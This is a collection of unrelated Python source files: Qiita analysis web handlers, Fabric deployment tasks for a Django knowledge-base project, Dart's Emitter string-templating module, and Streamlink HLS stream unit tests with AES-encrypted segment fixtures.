from qiita_pet.handlers.util import to_int
from qiita_pet.util import get_network_nodes_edges
from qiita_db.analysis import Analysis
from qiita_db.artifact import Artifact
class CreateAnalysisHandler(BaseHandler):
    """Creates a new analysis from the current user's default artifacts."""
    @authenticated
    def post(self):
        name = self.get_argument('name')
        desc = self.get_argument('description')
        # Checkbox semantics: missing -> False; browsers submit "on", which
        # may arrive as bytes or str depending on the tornado decode path.
        mdsi = self.get_argument('merge_duplicated_sample_ids', False)
        if mdsi in (b'on', 'on'):
            mdsi = True
        analysis = Analysis.create(
            self.current_user, name, desc, merge_duplicated_sample_ids=mdsi,
            from_default=True)
        self.redirect(u"%s/analysis/description/%s/"
                      % (qiita_config.portal_dir, analysis.id))
def analysis_description_handler_get_request(analysis_id, user):
    """Returns the analysis information
    Parameters
    ----------
    analysis_id : int
        The analysis id
    user : qiita_db.user.User
        The user performing the request
    Returns
    -------
    dict
        The analysis information needed to render the description page
    """
    analysis = Analysis(analysis_id)
    check_analysis_access(user, analysis)
    # Artifact-deletion jobs publish their state in redis under
    # "analysis_<id>"; surface that state as a page banner alert.
    job_info = r_client.get("analysis_%s" % analysis.id)
    alert_type = 'info'
    alert_msg = ''
    if job_info:
        job_info = loads(job_info)
        job_id = job_info['job_id']
        if job_id:
            r_payload = r_client.get(job_id)
            if r_payload:
                # Decode the payload already fetched above. The original code
                # issued a second r_client.get(job_id) here, which was
                # redundant and could race with the job updating or expiring
                # the key between the two reads.
                redis_info = loads(r_payload)
                if redis_info['status_msg'] == 'running':
                    alert_msg = ('An artifact is being deleted from this '
                                 'analysis')
                elif redis_info['return'] is not None:
                    alert_type = redis_info['return']['status']
                    alert_msg = redis_info['return']['message'].replace(
                        '\n', '</br>')
    artifacts = {}
    for aid, samples in analysis.samples.items():
        artifact = Artifact(aid)
        study = artifact.study
        artifacts[aid] = (
            study.id, study.title, artifact.merging_scheme, samples)
    return {'analysis_name': analysis.name,
            'analysis_id': analysis.id,
            'analysis_is_public': analysis.is_public,
            'analysis_description': analysis.description,
            'analysis_mapping_id': analysis.mapping_file,
            'alert_type': alert_type,
            'artifacts': artifacts,
            'alert_msg': alert_msg}
class AnalysisDescriptionHandler(BaseHandler):
    """Renders the analysis description page; POST makes the analysis public."""
    @authenticated
    @execute_as_transaction
    def get(self, analysis_id):
        res = analysis_description_handler_get_request(analysis_id,
                                                       self.current_user)
        self.render("analysis_description.html", **res)
    @authenticated
    @execute_as_transaction
    def post(self, analysis_id):
        analysis = Analysis(analysis_id)
        check_analysis_access(self.current_user, analysis)
        message = ''
        try:
            # Reuse the instance built above; the original constructed a
            # second, identical Analysis(analysis_id) here.
            analysis.make_public()
        except Exception as e:
            # Deliberately broad: any failure is shown in the page banner
            # instead of producing a 500.
            message = str(e)
        res = analysis_description_handler_get_request(
            analysis_id, self.current_user)
        if message:
            # this will display the error message in the main banner
            res['level'] = 'danger'
            res['message'] = message
        self.render("analysis_description.html", **res)
def analyisis_graph_handler_get_request(analysis_id, user):
    """Returns the graph information of the analysis
    Parameters
    ----------
    analysis_id : int
        The analysis id
    user : qiita_db.user.User
        The user performing the request
    Returns
    -------
    dict with the graph information
    Raises
    ------
    ValueError
        If there is more than one workflow in a single analysis
    """
    # NOTE: the "analyisis" typo in the name is kept intentionally -- callers
    # reference this function by its existing (misspelled) name.
    analysis = Analysis(analysis_id)
    # Check if the user actually has access to the analysis
    check_analysis_access(user, analysis)
    # A user has full access to the analysis if it is one of its private
    # analyses, the analysis has been shared with the user or the user is a
    # superuser or admin
    full_access = (analysis in (user.private_analyses | user.shared_analyses)
                   or user.level in {'superuser', 'admin'})
    nodes = []
    edges = []
    wf_id = None
    # Loop through all the initial artifacts of the analysis
    for artifact in analysis.artifacts:
        if artifact.processing_parameters is None:
            g = artifact.descendants_with_jobs
            nodes, edges, a_wf_id = get_network_nodes_edges(
                g, full_access, nodes=nodes, edges=edges)
            if wf_id is None:
                wf_id = a_wf_id
            elif a_wf_id is not None and wf_id != a_wf_id:
                # This should never happen, but worth having a useful message
                raise ValueError('More than one workflow in a single analysis')
    # Scan the accumulated node list exactly once. The original code rescanned
    # the whole (growing) list inside the artifact loop -- shadowing the loop
    # variable `a` -- which produced duplicate ids in artifacts_being_deleted
    # and redundant Artifact() database lookups.
    # nodes entries are [node_type, node_name, element_id]; we look for
    # node_type == 'artifact' and check whether that artifact is being deleted.
    artifacts_being_deleted = []
    for node in nodes:
        if (node[0] == 'artifact' and
                Artifact(node[2]).being_deleted_by is not None):
            artifacts_being_deleted.append(node[2])
    return {'edges': edges, 'nodes': nodes, 'workflow': wf_id,
            'artifacts_being_deleted': artifacts_being_deleted}
class AnalysisGraphHandler(BaseHandler):
    """Returns the processing network (nodes/edges) of an analysis as JSON."""
    @authenticated
    @execute_as_transaction
    def get(self, analysis_id):
        analysis_id = to_int(analysis_id)
        response = analyisis_graph_handler_get_request(
            analysis_id, self.current_user)
        self.write(response)
def analyisis_job_handler_get_request(analysis_id, user):
    """Returns the job information of the analysis
    Parameters
    ----------
    analysis_id: int
        The analysis id
    user : qiita_db.user.User
        The user performing the request
    Returns
    -------
    dict with the jobs information
    """
    # NOTE: "analyisis" typo kept -- callers use this exact name.
    analysis = Analysis(analysis_id)
    # Check if the user actually has access to the analysis
    check_analysis_access(user, analysis)
    # Map each job id to its status/step and error message (if any).
    return {
        j.id: {'status': j.status, 'step': j.step,
               'error': j.log.msg if j.log else ""}
        for j in analysis.jobs}
class AnalysisJobsHandler(BaseHandler):
    """Returns the job status summary of an analysis as JSON."""
    @authenticated
    @execute_as_transaction
    def get(self, analysis_id):
        analysis_id = to_int(analysis_id)
        response = analyisis_job_handler_get_request(
            analysis_id, self.current_user)
        self.write(response)
|
|
# -*- coding: utf-8 -*-
from fabric.api import cd, env, require, run, task
from fabric.colors import green, white
from fabric.context_managers import contextmanager, prefix, shell_env
from fabric.operations import put
from fabric.utils import puts
from fabutils import arguments, join, options
from fabutils.context import cmd_msg
from fabutils.env import set_env_from_json_file
from fabutils.tasks import ulocal, ursync_project, urun
from fabutils.text import SUCCESS_ART
@contextmanager
def virtualenv():
    """Activate virtualenv.
    Activates the virtualenv in which the commands shall be run.
    """
    require('site_dir', 'django_settings')
    # Run inside the project directory with the proper settings module so that
    # every manage.py invocation picks up the right configuration.
    with cd(env.site_dir):
        with shell_env(DJANGO_SETTINGS_MODULE=env.django_settings):
            yield
@task
def environment(env_name):
    """Creates environment.
    Creates a dynamic environment based on the contents of the given
    environments_file.
    Args:
        env_name(str): Name environment.
    """
    if env_name == 'vagrant':
        # Vagrant boxes need the auto-generated SSH key for fabric to connect.
        result = ulocal('vagrant ssh-config | grep IdentityFile', capture=True)
        env.key_filename = result.split()[1].replace('"', '')
    set_env_from_json_file('environments.json', env_name)
@task
def startapp(app_name):
    """Create new app
    Create a new app inside the Django project.
    Args:
        app_name(str): Name of new app inside project.
    Usage:
        >>> fab environment:vagrant startapp:'app_name'.
    """
    with virtualenv():
        run(join('python manage.py startapp', app_name))
@task
def load_mandatory_dummy_data(*args):
    """
    Loads the dummy data for developing.
    """
    # NOTE(review): this task is currently a no-op stub -- it loads nothing.
    # Presumably it should call loaddata() with the mandatory fixtures;
    # confirm the intended fixture list before wiring it up.
@task
def load_dummy_data(*args):
    """
    Loads the dummy data for developing.
    """
    # Fixture order matters: areas/categories/subjects must exist before the
    # posts that reference them.
    loaddata(
        'areas.json',
        'categories.json',
        'subjects.json',
        'dummy_superuser.json',
        'posts.json',
    )
@task
def createsuperuser():
    """Create superuser.
    Create a superuser to use in the Django application.
    Usage:
        >>> fab environment:vagrant createsuperuser.
    """
    # Interactive: manage.py will prompt for username/email/password.
    with virtualenv():
        run('python manage.py createsuperuser')
@task
def createdb():
    """New database.
    Creates a new database instance with utf-8 encoding for the project.
    Usage:
        >>>fab environment:vagrant createdb.
    """
    urun('createdb knowledge_base -l en_US.UTF-8 -E UTF8 -T template0')
@task
def resetdb():
    """Restore database.
    Reset the project's database by dropping and creating it again.
    Usage:
        >>>fab environment:vagrant resetdb.
    """
    # Full cycle: drop, recreate, migrate schema, seed dev fixtures.
    urun('dropdb knowledge_base')
    createdb()
    migrate()
    load_dummy_data()
@task
def bootstrap():
    """Builds the environment to start the project.
    Create database, apply migrations and collect the static files.
    Usage:
        >>>fab environment:vagrant bootstrap.
    """
    # Build the DB schema and collect the static files.
    createdb()
    migrate()
    load_dummy_data()
    collectstatic()
@task
def loaddata(*args):
    """Loads the given data fixtures into the project's database.
    Args:
        args(str): Name fixture.
    Usage:
        >>>fab environment:vagrant loaddata:'fixture'.
    """
    with virtualenv():
        run(join('python manage.py loaddata', arguments(*args)))
@task
def makemigrations(*args, **kwargs):
    """Creates the new migrations based on the project's models changes.
    Creating new migrations based on the changes you have made to your models.
    Args:
        args (Optional[str]): Create migration for app_name.
    Example:
        fab environment:vagrant makemigrations.
    """
    with virtualenv():
        run(join('python manage.py makemigrations',
                 options(**kwargs), arguments(*args)))
@task
def migrate(*args, **kwargs):
    """Apply migrations.
    Syncs the DB and applies the available migrations.
    Args:
        args (Optional[str]): Specified apps has its migrations.
        kwargs (Optional[str]): Brings the database schema to state where the
            named migration is applied (migrate_name).
    Example:
        >>>fab environment:vagrant migrate.
    """
    with virtualenv():
        run(join('python manage.py migrate',
                 options(**kwargs), arguments(*args)))
@task
def collectstatic():
    """Collects the static files.
    Usage:
        >>> fab environment:vagrant collectstatic.
    """
    with virtualenv():
        run('python manage.py collectstatic --noinput')
@task
def runserver():
    """Run project.
    Starts the development server inside the Vagrant VM.
    Usage:
        >>>fab environment:vagrant runserver.
    """
    # runserver_plus comes from django-extensions (Werkzeug debugger).
    with virtualenv():
        run('python manage.py runserver_plus')
@contextmanager
def node():
    """
    Activates the node version in which the commands shall be run.
    """
    # CI=true makes npm/bower run non-interactively.
    with cd(env.site_dir):
        with prefix('nvm use stable'), shell_env(CI='true'):
            yield
@task
def bower_install(*args, **kwargs):
    """
    Installs frontend dependencies with bower.
    """
    with node():
        run(join('bower install',
                 options(**kwargs), arguments(*args)))
@task
def npm_install():
    """
    Installs the nodejs dependencies defined in package.json
    """
    with node():
        run('npm install')
@task
def deploy(git_ref, upgrade=False):
    """Deploy project.
    Deploy the code of the given git reference to the previously selected
    environment.
    Args:
        upgrade(Optional[bool]):
            Pass ``upgrade=True`` to upgrade the versions of the already
            installed project requirements (with pip)
        git_ref(str): name branch you make deploy.
    Example:
        >>>fab environment:vagrant deploy:devel.
    """
    require('hosts', 'user', 'group', 'site_dir', 'django_settings')
    # Retrieves git reference metadata and creates a temp directory with the
    # contents resulting of applying a ``git archive`` command.
    message = white('Creating git archive from {0}'.format(git_ref), bold=True)
    with cmd_msg(message):
        repo = ulocal(
            'basename `git rev-parse --show-toplevel`', capture=True)
        commit = ulocal(
            'git rev-parse --short {0}'.format(git_ref), capture=True)
        branch = ulocal(
            'git rev-parse --abbrev-ref HEAD', capture=True)
        tmp_dir = '/tmp/blob-{0}-{1}/'.format(repo, commit)
        ulocal('rm -fr {0}'.format(tmp_dir))
        ulocal('mkdir {0}'.format(tmp_dir))
        ulocal('git archive {0} ./src | tar -xC {1} --strip 1'.format(
            commit, tmp_dir))
    # Uploads the code of the temp directory to the host with rsync telling
    # that it must delete old files in the server, upload deltas by checking
    # file checksums recursivelly in a zipped way; changing the file
    # permissions to allow read, write and execution to the owner, read and
    # execution to the group and no permissions for any other user.
    with cmd_msg(white('Uploading code to server...', bold=True)):
        ursync_project(
            local_dir=tmp_dir,
            remote_dir=env.site_dir,
            delete=True,
            default_opts='-chrtvzP',
            extra_opts='--chmod=750',
            exclude=["*.pyc", "env/", "cover/"]
        )
    # Performs the deployment task, i.e. Install/upgrade project
    # requirements, syncronize and migrate the database changes, collect
    # static files, reload the webserver, etc.
    message = white('Running deployment tasks', bold=True)
    with cmd_msg(message, grouped=True):
        with virtualenv():
            message = white('Installing Python requirements with pip')
            with cmd_msg(message, spaces=2):
                run('pip install -{0}r ./requirements/production.txt'.format(
                    'U' if upgrade else ''))
            message = white('Migrating database')
            with cmd_msg(message, spaces=2):
                run('python manage.py migrate --noinput')
            # Consistency fix: these two messages were plain strings while
            # every sibling message is wrapped in white().
            message = white('Installing node modules')
            with cmd_msg(message, spaces=2):
                npm_install()
            message = white('Installing bower components')
            with cmd_msg(message, spaces=2):
                bower_install()
            message = white('Collecting static files')
            with cmd_msg(message, spaces=2):
                run('python manage.py collectstatic --noinput')
            message = white('Setting file permissions')
            with cmd_msg(message, spaces=2):
                run('chgrp -R {0} .'.format(env.group))
                run('chgrp -R {0} ../media'.format(env.group))
            message = white('Restarting webserver')
            with cmd_msg(message, spaces=2):
                run('touch ../reload')
            message = white('Registering deployment')
            with cmd_msg(message, spaces=2):
                register_deployment(commit, branch)
    # Clean the temporary snapshot files that was just deployed to the host
    message = white('Cleaning up...', bold=True)
    with cmd_msg(message):
        ulocal('rm -fr {0}'.format(tmp_dir))
    puts(green(SUCCESS_ART), show_prefix=False)
    puts(white('Code from {0} was succesfully deployed to host {1}'.format(
        git_ref, ', '.join(env.hosts)), bold=True), show_prefix=False)
@task
def register_deployment(commit, branch):
    """Register deployment.
    Register the current deployment at Opbeat with given commit and branch.
    Args:
        commit(str): This is last commit project.
        branch(str): Name branch.
    """
    # The OPBEAT_* variables are expanded by the remote shell, so credentials
    # never appear in the fabric command line locally.
    with virtualenv():
        run(
            'curl https://intake.opbeat.com/api/v1/'
            'organizations/$OPBEAT_ORGANIZATION_ID/'
            'apps/$OPBEAT_APP_ID/releases/ \
            -H "Authorization: Bearer $OPBEAT_SECRET_TOKEN" \
            -d rev={commit} \
            -d branch={branch} \
            -d status=completed'
            .format(
                commit=commit, branch=branch
            )
        )
@task
def inspectdb(filename=""):
    """Inspection database.
    Allows the inspection of legacy databases inside Django projects.
    Args:
        filename(str): Name output file.
    Usage:
        >>> fab environment:vagrant inspectdb
            Print the models needed to work with the database
        >>> fab environment:vagrant inspectdb:'filename'
            Use 'filename' as the output file.
    """
    with virtualenv():
        if filename:
            # Redirect the generated models into the requested file.
            run(join('python manage.py inspectdb > ', filename))
        else:
            run('python manage.py inspectdb')
# Haystack index tasks
@task
def rebuild_index():
    """
    rebuilds index for haystack search_indexes.
    """
    with virtualenv():
        run('python manage.py rebuild_index --noinput')
# Solr tasks
@task
def run_solr():
    """
    Starts the Sorl demo search engine.
    """
    # Refresh the schema first so Solr starts with the project's config.
    update_solr_schema()
    require('solr_dir')
    with cd(env.solr_dir):
        run('java -jar start.jar')
@task
def update_solr_schema():
    """
    Replaces project schema file into local solr.
    """
    require('solr_dir', 'site_dir')
    command = (
        'cp {}templates/search_configuration/solr.xml '
        '{}solr/collection1/conf/schema.xml'
    ).format(
        env.site_dir,
        env.solr_dir
    )
    run(command)
@task
def replace_solr_schema(core):
    """
    Replaces solr schema for the given environment.
    example:
        - fab environment:solr replace_solr_schema:staging
        - fab environment:solr replace_solr_schema:production
    """
    require('schema_remote_path', "schema_local_path")
    # schema_remote_path maps core name -> remote schema location.
    put(
        env.schema_local_path,
        env.schema_remote_path[core]
    )
    run('sudo systemctl restart solr')
@task
def dropdb():
    """Drop database.
    Drop database without create it again
    Usage:
        >>>fab environment:vagrant dropdb.
    """
    urun('dropdb knowledge_base')
|
|
#!/usr/bin/python
# Copyright (c) 2011, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Templating to help generate structured text."""
import logging
import re
_logger = logging.getLogger('emitter')
def Format(template, **parameters):
  """Create a string using the same template syntax as Emitter.Emit."""
  emitter = Emitter()
  emitter._Emit(template, parameters)
  return ''.join(emitter.Fragments())
class Emitter(object):
  """An Emitter collects string fragments to be assembled into a single string.
  """
  def __init__(self, bindings=None):
    self._items = [] # A new list
    self._bindings = bindings or Emitter.Frame({}, None)
  def EmitRaw(self, item):
    """Emits literal string with no substitution."""
    self._items.append(item)
  def Emit(self, template_source, **parameters):
    """Emits a template, substituting named parameters and returning emitters to
    fill the named holes.
    Ordinary substitution occurs at $NAME or $(NAME). If there is no parameter
    called NAME, the text is left as-is. So long as you don't bind FOO as a
    parameter, $FOO in the template will pass through to the generated text.
    Substitution of $?NAME and $(?NAME) yields an empty string if NAME is not a
    parameter.
    Values passed as named parameters should be strings or simple integral
    values (int or long).
    Named holes are created at $!NAME or $(!NAME). A hole marks a position in
    the template that may be filled in later. An Emitter is returned for each
    named hole in the template. The holes are filled by emitting to the
    corresponding emitter.
    Emit returns either a single Emitter if the template contains one hole or a
    tuple of emitters for several holes, in the order that the holes occur in
    the template.
    The emitters for the holes remember the parameters passed to the initial
    call to Emit. Holes can be used to provide a binding context.
    """
    return self._Emit(template_source, parameters)
  def _Emit(self, template_source, parameters):
    """Implementation of Emit, with map in place of named parameters."""
    template = self._ParseTemplate(template_source)
    parameter_bindings = self._bindings.Extend(parameters)
    hole_names = template._holes
    if hole_names:
      # Each hole gets a child Emitter; binding the hole name to that
      # emitter's item list lets later writes appear in place.
      hole_map = {}
      replacements = {}
      for name in hole_names:
        emitter = Emitter(parameter_bindings)
        replacements[name] = emitter._items
        hole_map[name] = emitter
      full_bindings = parameter_bindings.Extend(replacements)
    else:
      full_bindings = parameter_bindings
    self._ApplyTemplate(template, full_bindings)
    # Return None, a singleton or tuple of the hole names.
    if not hole_names:
      return None
    if len(hole_names) == 1:
      return hole_map[hole_names[0]]
    else:
      return tuple(hole_map[name] for name in hole_names)
  def Fragments(self):
    """Returns a list of all the string fragments emitted."""
    def _FlattenTo(item, output):
      # Items may be nested lists (one per template application) and
      # deferred lookups that must be resolved now, at assembly time.
      if isinstance(item, list):
        for subitem in item:
          _FlattenTo(subitem, output)
      elif isinstance(item, Emitter.DeferredLookup):
        value = item._environment.Lookup(item._lookup._name,
                                         item._lookup._value_if_missing)
        _FlattenTo(value, output)
      else:
        output.append(str(item))
    output = []
    _FlattenTo(self._items, output)
    return output
  def Bind(self, var, template_source, **parameters):
    """Adds a binding for var to this emitter."""
    template = self._ParseTemplate(template_source)
    if template._holes:
      raise RuntimeError('Cannot have holes in Emitter.Bind')
    bindings = self._bindings.Extend(parameters)
    value = Emitter(bindings)
    value._ApplyTemplate(template, bindings)
    self._bindings = self._bindings.Extend({var: value._items})
    return value
  def _ParseTemplate(self, source):
    """Converts the template string into a Template object."""
    # TODO(sra): Cache the parsing.
    items = []
    holes = []
    # Break source into a sequence of text fragments and substitution lookups.
    pos = 0
    while True:
      match = Emitter._SUBST_RE.search(source, pos)
      if not match:
        items.append(source[pos:])
        break
      text_fragment = source[pos:match.start()]
      if text_fragment:
        items.append(text_fragment)
      pos = match.end()
      term = match.group()
      name = match.group(1) or match.group(2) # $NAME and $(NAME)
      if name:
        # Plain substitution: unbound names fall back to the literal term.
        item = Emitter.Lookup(name, term, term)
        items.append(item)
        continue
      name = match.group(3) or match.group(4) # $!NAME and $(!NAME)
      if name:
        item = Emitter.Lookup(name, term, term)
        items.append(item)
        holes.append(name)
        continue
      name = match.group(5) or match.group(6) # $?NAME and $(?NAME)
      if name:
        # Optional hole: substitutes to '' when never filled or bound.
        item = Emitter.Lookup(name, term, '')
        items.append(item)
        holes.append(name)
        continue
      raise RuntimeError('Unexpected group')
    if len(holes) != len(set(holes)):
      raise RuntimeError('Cannot have repeated holes %s' % holes)
    return Emitter.Template(items, holes)
  _SUBST_RE = re.compile(
      # $FOO $(FOO) $!FOO $(!FOO) $?FOO $(?FOO)
      r'\$(\w+)|\$\((\w+)\)|\$!(\w+)|\$\(!(\w+)\)|\$\?(\w+)|\$\(\?(\w+)\)')
  def _ApplyTemplate(self, template, bindings):
    """Emits the items from the parsed template."""
    result = []
    for item in template._items:
      if isinstance(item, str):
        if item:
          result.append(item)
      elif isinstance(item, Emitter.Lookup):
        # Bind lookup to the current environment (bindings)
        # TODO(sra): More space efficient to do direct lookup.
        result.append(Emitter.DeferredLookup(item, bindings))
      else:
        raise RuntimeError('Unexpected template element')
    # Collected fragments are in a sublist, so self._items contains one element
    # (sublist) per template application.
    self._items.append(result)
  class Lookup(object):
    """An element of a parsed template."""
    def __init__(self, name, original, default):
      self._name = name
      self._original = original
      self._value_if_missing = default
  class DeferredLookup(object):
    """A lookup operation that is deferred until final string generation."""
    # TODO(sra): A deferred lookup will be useful when we add expansions that
    # have behaviour condtional on the contents, e.g. adding separators between
    # a list of items.
    def __init__(self, lookup, environment):
      self._lookup = lookup
      self._environment = environment
  class Template(object):
    """A parsed template."""
    def __init__(self, items, holes):
      self._items = items # strings and lookups
      self._holes = holes
  class Frame(object):
    """A Frame is a set of bindings derived from a parent."""
    def __init__(self, map, parent):
      self._map = map
      self._parent = parent
    def Lookup(self, name, default):
      # Walk up the parent chain until the name is found.
      if name in self._map:
        return self._map[name]
      if self._parent:
        return self._parent.Lookup(name, default)
      return default
    def Extend(self, map):
      return Emitter.Frame(map, self)
|
|
import os
import typing
import unittest
from threading import Event
from unittest.mock import Mock, call, patch
import pytest
import requests_mock
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from streamlink.session import Streamlink
from streamlink.stream.hls import HLSStream, HLSStreamReader
from tests.mixins.stream_hls import EventedHLSStreamWriter, Playlist, Segment, Tag, TestMixinStreamHLS
from tests.resources import text
class EncryptedBase:
    """Mixin that AES-CBC-encrypts a test segment/tag's content."""
    def __init__(self, num, key, iv, *args, padding=b"", append=b"", **kwargs):
        super().__init__(num, *args, **kwargs)
        aesCipher = AES.new(key, AES.MODE_CBC, iv)
        # Use explicit padding when provided, otherwise standard PKCS#7.
        padded = self.content + padding if padding else pad(self.content, AES.block_size, style="pkcs7")
        # Keep the plaintext so tests can assert against decrypted output.
        self.content_plain = self.content
        self.content = aesCipher.encrypt(padded) + append
class TagMap(Tag):
    """EXT-X-MAP tag pointing at a mocked initialization-section URL."""
    def __init__(self, num, namespace, attrs=None):
        self.path = f"map{num}"
        self.content = f"[map{num}]".encode("ascii")
        super().__init__("EXT-X-MAP", {
            "URI": self.val_quoted_string(self.url(namespace)),
            **(attrs or {})
        })
class TagMapEnc(EncryptedBase, TagMap):
    """EXT-X-MAP tag whose payload is AES-CBC encrypted."""
    pass
class TagKey(Tag):
    """EXT-X-KEY tag; optional attributes are only emitted when given."""
    path = "encryption.key"
    def __init__(self, method="NONE", uri=None, iv=None, keyformat=None, keyformatversions=None):
        attrs = {"METHOD": method}
        if uri is not False:  # pragma: no branch
            # Resolve the URI lazily so it can include the test namespace.
            attrs.update({"URI": lambda tag, namespace: tag.val_quoted_string(tag.url(namespace))})
        if iv is not None:  # pragma: no branch
            attrs.update({"IV": self.val_hex(iv)})
        if keyformat is not None:  # pragma: no branch
            attrs.update({"KEYFORMAT": self.val_quoted_string(keyformat)})
        if keyformatversions is not None:  # pragma: no branch
            attrs.update({"KEYFORMATVERSIONS": self.val_quoted_string(keyformatversions)})
        super().__init__("EXT-X-KEY", attrs)
        self.uri = uri
    def url(self, namespace):
        # A custom uri template overrides the default path-based URL.
        return self.uri.format(namespace=namespace) if self.uri else super().url(namespace)
class SegmentEnc(EncryptedBase, Segment):
    """Media segment whose payload is AES-CBC encrypted."""
    pass
class TestHLSStreamRepr(unittest.TestCase):
    """repr() of HLSStream with and without a master playlist URL."""
    def test_repr(self):
        session = Streamlink()
        stream = HLSStream(session, "https://foo.bar/playlist.m3u8")
        self.assertEqual(repr(stream), "<HLSStream('https://foo.bar/playlist.m3u8', None)>")
        stream = HLSStream(session, "https://foo.bar/playlist.m3u8", "https://foo.bar/master.m3u8")
        self.assertEqual(repr(stream), "<HLSStream('https://foo.bar/playlist.m3u8', 'https://foo.bar/master.m3u8')>")
class TestHLSVariantPlaylist(unittest.TestCase):
    """Parsing of master (variant) playlists from fixture files."""
    @classmethod
    def get_master_playlist(cls, playlist):
        with text(playlist) as pl:
            return pl.read()
    def subject(self, playlist, options=None):
        # Serve the fixture playlist from a per-test mocked URL (self.id()
        # keeps URLs unique across tests).
        with requests_mock.Mocker() as mock:
            url = "http://mocked/{0}/master.m3u8".format(self.id())
            content = self.get_master_playlist(playlist)
            mock.get(url, text=content)
            session = Streamlink(options)
            return HLSStream.parse_variant_playlist(session, url)
    def test_variant_playlist(self):
        streams = self.subject("hls/test_master.m3u8")
        self.assertEqual(
            list(streams.keys()),
            ["720p", "720p_alt", "480p", "360p", "160p", "1080p (source)", "90k"],
            "Finds all streams in master playlist"
        )
        self.assertTrue(
            all([isinstance(stream, HLSStream) for stream in streams.values()]),
            "Returns HLSStream instances"
        )
class EventedHLSReader(HLSStreamReader):
    # Swap in the evented writer so tests can step segment writes manually.
    __writer__ = EventedHLSStreamWriter
class EventedHLSStream(HLSStream):
    # HLSStream variant wired to the evented reader/writer for stepped tests.
    __reader__ = EventedHLSReader
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStream(TestMixinStreamHLS, unittest.TestCase):
    """Core HLS behavior: start_offset/duration handling and EXT-X-MAP."""
    def get_session(self, options=None, *args, **kwargs):
        session = super().get_session(options)
        session.set_option("hls-live-edge", 3)
        return session
    def test_offset_and_duration(self):
        thread, segments = self.subject([
            Playlist(1234, [Segment(0), Segment(1, duration=0.5), Segment(2, duration=0.5), Segment(3)], end=True)
        ], streamoptions={"start_offset": 1, "duration": 1})
        data = self.await_read(read_all=True)
        self.assertEqual(data, self.content(segments, cond=lambda s: 0 < s.num < 3), "Respects the offset and duration")
        self.assertTrue(all(self.called(s) for s in segments.values() if 0 < s.num < 3), "Downloads second and third segment")
        # BUG FIX: the original filter was `0 > s.num > 3`, a chained
        # comparison that is never true, so this assertion only ever checked
        # an empty sequence. "Other segments" are those outside (0, 3).
        self.assertFalse(any(self.called(s) for s in segments.values() if not 0 < s.num < 3), "Skips other segments")
    def test_map(self):
        discontinuity = Tag("EXT-X-DISCONTINUITY")
        map1 = TagMap(1, self.id())
        map2 = TagMap(2, self.id())
        self.mock("GET", self.url(map1), content=map1.content)
        self.mock("GET", self.url(map2), content=map2.content)
        thread, segments = self.subject([
            Playlist(0, [map1, Segment(0), Segment(1), Segment(2), Segment(3)]),
            Playlist(4, [map1, Segment(4), map2, Segment(5), Segment(6), discontinuity, Segment(7)], end=True)
        ])
        data = self.await_read(read_all=True, timeout=None)
        self.assertEqual(data, self.content([
            map1, segments[1], map1, segments[2], map1, segments[3],
            map1, segments[4], map2, segments[5], map2, segments[6], segments[7]
        ]))
        self.assertTrue(self.called(map1, once=True), "Downloads first map only once")
        self.assertTrue(self.called(map2, once=True), "Downloads second map only once")
@patch("streamlink.stream.hls.HLSStreamWorker.wait", Mock(return_value=True))
class TestHLSStreamByterange(TestMixinStreamHLS, unittest.TestCase):
    """EXT-X-BYTERANGE handling: Range headers and missing-offset errors."""
    __stream__ = EventedHLSStream
    # The dummy segments in the error tests are required because the writer's run loop would otherwise continue forever
    # due to the segment's future result being None (no requests result), and we can't await the end of the stream
    # without waiting for the stream's timeout error. The dummy segments ensure that we can call await_write for these
    # successful segments, so we can close the stream afterwards and safely make the test assertions.
    # The EventedHLSStreamWriter could also implement await_fetch, but this is unnecessarily more complex than it already is.
    @patch("streamlink.stream.hls.log")
    def test_unknown_offset(self, mock_log: Mock):
        # A BYTERANGE without "@offset" and no prior range to continue from.
        thread, _ = self.subject([
            Playlist(0, [
                Tag("EXT-X-BYTERANGE", "3"), Segment(0),
                Segment(1)
            ], end=True)
        ])
        self.await_write(2 - 1)
        self.thread.close()
        self.assertEqual(mock_log.error.call_args_list, [
            call("Failed to fetch segment 0: Missing BYTERANGE offset")
        ])
        self.assertFalse(self.called(Segment(0)))
    @patch("streamlink.stream.hls.log")
    def test_unknown_offset_map(self, mock_log: Mock):
        # Same failure mode, but on an EXT-X-MAP's BYTERANGE attribute.
        map1 = TagMap(1, self.id(), {"BYTERANGE": "\"1234\""})
        self.mock("GET", self.url(map1), content=map1.content)
        thread, _ = self.subject([
            Playlist(0, [
                Segment(0),
                map1,
                Segment(1)
            ], end=True)
        ])
        self.await_write(3 - 1)
        self.thread.close()
        self.assertEqual(mock_log.error.call_args_list, [
            call("Failed to fetch map for segment 1: Missing BYTERANGE offset")
        ])
        self.assertFalse(self.called(map1))
    @patch("streamlink.stream.hls.log")
    def test_invalid_offset_reference(self, mock_log: Mock):
        # An offset-less BYTERANGE may only continue the *immediately*
        # preceding ranged segment; segment 1 in between breaks the chain.
        thread, _ = self.subject([
            Playlist(0, [
                Tag("EXT-X-BYTERANGE", "3@0"), Segment(0),
                Segment(1),
                Tag("EXT-X-BYTERANGE", "5"), Segment(2),
                Segment(3)
            ], end=True)
        ])
        self.await_write(4 - 1)
        self.thread.close()
        self.assertEqual(mock_log.error.call_args_list, [
            call("Failed to fetch segment 2: Missing BYTERANGE offset")
        ])
        self.assertEqual(self.mocks[self.url(Segment(0))].last_request._request.headers["Range"], "bytes=0-2")
        self.assertFalse(self.called(Segment(2)))
    def test_offsets(self):
        # Happy path: explicit offsets and offset-less continuations must all
        # translate into the correct HTTP Range headers.
        map1 = TagMap(1, self.id(), {"BYTERANGE": "\"1234@0\""})
        map2 = TagMap(2, self.id(), {"BYTERANGE": "\"42@1337\""})
        self.mock("GET", self.url(map1), content=map1.content)
        self.mock("GET", self.url(map2), content=map2.content)
        s1, s2, s3, s4, s5 = Segment(0), Segment(1), Segment(2), Segment(3), Segment(4)
        self.subject([
            Playlist(0, [
                map1,
                Tag("EXT-X-BYTERANGE", "5@3"), s1,
                Tag("EXT-X-BYTERANGE", "7"), s2,
                map2,
                Tag("EXT-X-BYTERANGE", "11"), s3,
                Tag("EXT-X-BYTERANGE", "17@13"), s4,
                Tag("EXT-X-BYTERANGE", "19"), s5,
            ], end=True)
        ])
        self.await_write(5 * 2)
        self.await_read(read_all=True)
